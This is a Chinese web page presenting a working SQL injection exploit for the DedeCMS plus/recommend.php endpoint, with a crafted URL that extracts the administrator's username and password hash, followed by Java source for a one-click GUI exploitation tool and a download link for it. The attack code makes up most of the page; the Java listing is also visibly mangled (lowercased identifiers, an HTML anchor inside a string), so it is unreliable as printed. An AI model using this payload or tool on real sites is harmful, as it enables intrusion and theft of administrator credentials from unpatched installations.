DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日

dedecms即织梦(php开源网站内容管理系统)。织梦内容管理系统(dedecms) 以简单、实用、开源而闻名,是国内最知名的php开源网站管理系统,也是使用用户最多的php类cms系统。




近日,网友在dedecms中发现了全版本通杀的sql注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

exp:


代码如下:

http://*.*.com/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=111


直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示

DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日



利用工具源码(by 园长):


代码如下:

package org.javaweb.dede.ui;

import java.awt.toolkit;
import java.io.bufferedreader;
import java.io.inputstreamreader;
import java.net.url;
import java.util.regex.matcher;
import java.util.regex.pattern;

/**
* Swing front-end for the recommend.php injection shown in the prose above:
* one text field for the site base URL, a button whose handler
* ({@link #jbutton1actionperformed}) sends the crafted request, and a text
* area that shows either the parsed result or the error text.
*
* NOTE(review): the listing is extraction-mangled — every Java identifier has
* been lowercased ({@code string}, {@code bufferedreader}, {@code jframe}) and
* an HTML anchor was spliced into the default-URL literal in
* {@code initcomponents} — so it does not compile as printed. It is kept
* byte-identical here.
*
* Defender's view: the request the handler builds is a GET to
* {@code plus/recommend.php} whose query string carries {@code _files[type][...]}
* keys with SQL inside {@code tmp_name}; that request shape in access logs or
* a WAF rule is the detection, and the official fixed release mentioned in the
* prose above is the remediation.
*
* @author yz
*/
public class mainframe extends javax.swing.jframe {

private static final long serialversionuid = 1l;

/**
* creates new form mainframe: builds the UI via {@link #initcomponents()}.
*/
public mainframe() {
initcomponents();
}

/**
* Fetches {@code url} with a plain {@link java.net.URL#openStream()} and
* returns the whole body as one CRLF-joined string.
*
* <p>Any failure (malformed URL, connection or read error) is reported by
* writing {@code e.toString()} into the text area, and whatever was read so
* far (possibly "") is returned. The reader is never closed, no timeout is
* set, and the body is decoded with the platform default charset — all
* visible in the code, none of them handled.
*
* @param url absolute URL to fetch
* @return the response body, or "" (or a partial body) on error
*/
public string request(string url){
string str = "",tmp;
try {
bufferedreader br = new bufferedreader(new inputstreamreader(new url(url).openstream()));
while((tmp=br.readline())!=null){
str+=tmp+"\r\n"; // line terminators are normalised to CRLF
}
} catch (exception e) {
jtextarea1.settext(e.tostring()); // error text replaces any previous result
}
return str;
}

/**
* Builds the single-panel UI (NetBeans-style GroupLayout code) and centres a
* 458x316 window on the primary screen.
*/
private void initcomponents() {

jpanel1 = new javax.swing.jpanel();
jlabel1 = new javax.swing.jlabel();
jtextfield1 = new javax.swing.jtextfield();
jbutton1 = new javax.swing.jbutton();
jscrollpane1 = new javax.swing.jscrollpane();
jtextarea1 = new javax.swing.jtextarea();

setdefaultcloseoperation(javax.swing.windowconstants.exit_on_close);

jlabel1.settext("url:");
// NOTE(review): the HTML anchor inside this literal is an artefact of the
// page extraction, not of the original source.
jtextfield1.settext("<a href="http://localhost">http://localhost</a>");

this.settitle("dedecms recommend.php注入利用工具-p2j.cn");

// centre the frame: half of the 458x316 size subtracted from the screen midpoint
int screenwidth = toolkit.getdefaulttoolkit().getscreensize().width;
int screenheight = toolkit.getdefaulttoolkit().getscreensize().height;
this.setbounds(screenwidth / 2 - 229, screenheight / 2 - 158, 458, 316);

jbutton1.settext("获取");
// button click delegates to jbutton1actionperformed
jbutton1.addactionlistener(new java.awt.event.actionlistener() {
public void actionperformed(java.awt.event.actionevent evt) {
jbutton1actionperformed(evt);
}
});

jtextarea1.setcolumns(20);
jtextarea1.setrows(5);
jscrollpane1.setviewportview(jtextarea1);

// inner panel: label + text field + button on one row, result area below
javax.swing.grouplayout jpanel1layout = new javax.swing.grouplayout(jpanel1);
jpanel1.setlayout(jpanel1layout);
jpanel1layout.sethorizontalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.trailing, false)
.addcomponent(jscrollpane1, javax.swing.grouplayout.alignment.leading)
.addgroup(javax.swing.grouplayout.alignment.leading, jpanel1layout.createsequentialgroup()
.addcontainergap()
.addcomponent(jlabel1)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jtextfield1, javax.swing.grouplayout.preferred_size, 331, javax.swing.grouplayout.preferred_size)
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jbutton1, javax.swing.grouplayout.preferred_size, 83, javax.swing.grouplayout.preferred_size)))
.addgap(0, 0, short.max_value))
);
jpanel1layout.setverticalgroup(
jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addgroup(jpanel1layout.createsequentialgroup()
.addcontainergap()
.addgroup(jpanel1layout.createparallelgroup(javax.swing.grouplayout.alignment.baseline)
.addcomponent(jlabel1)
.addcomponent(jtextfield1,
javax.swing.grouplayout.preferred_size,
javax.swing.grouplayout.default_size,
javax.swing.grouplayout.preferred_size)
.addcomponent(jbutton1))
.addpreferredgap(javax.swing.layoutstyle.componentplacement.related)
.addcomponent(jscrollpane1, javax.swing.grouplayout.default_size, 254, short.max_value))
);

// content pane: the single panel fills the frame
javax.swing.grouplayout layout = new javax.swing.grouplayout(getcontentpane());
getcontentpane().setlayout(layout);
layout.sethorizontalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);
layout.setverticalgroup(
layout.createparallelgroup(javax.swing.grouplayout.alignment.leading)
.addcomponent(jpanel1, javax.swing.grouplayout.default_size, javax.swing.grouplayout.default_size, short.max_value)
);

pack();
}// </editor-fold>

/**
* "获取" button handler. Reads the base URL from the text field (returns
* silently when it is null or empty), sends the request from the page's exp
* against {@code <base>/plus/recommend.php} via {@link #request(string)},
* then looks for the first {@code <h2>...</h2>} in the response, splits it
* on '|' and prints the second and third fields as username / md5.
*
* @param evt the button event (unused)
*/
private void jbutton1actionperformed(java.awt.event.actionevent evt) {
string url = jtextfield1.gettext();
if(null==url||"".equals(url)){
return ;
}
string result = request(url+"/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20concat(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_files[type][name]=1.jpg&_files[type][type]=application/octet-stream&_files[type][size]=4294");
matcher m = pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
string[] s = m.group(1).split("\\|");
if(s.length>2){
jtextarea1.settext("username:"+s[1]+"\r\nmd5:"+s[2].substring(3,s[2].length()-1));
}
}
}

/**
* Entry point: shows the frame on the AWT event dispatch thread.
*
* @param args unused
*/
public static void main(string args[]) {
java.awt.eventqueue.invokelater(new runnable() {
public void run() {
new mainframe().setvisible(true);
}
});
}

// variables declaration - do not modify
private javax.swing.jbutton jbutton1;
private javax.swing.jlabel jlabel1;
private javax.swing.jpanel jpanel1;
private javax.swing.jscrollpane jscrollpane1;
private javax.swing.jtextarea jtextarea1;
private javax.swing.jtextfield jtextfield1;
// end of variables declaration
}


利用工具下载地址 http://pan.baidu.com/s/1i37lunf (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)


dedecms官方补丁地址:(原文此处链接缺失)如上文所述,官方最新版已修复该漏洞,请升级至官方最新版本。
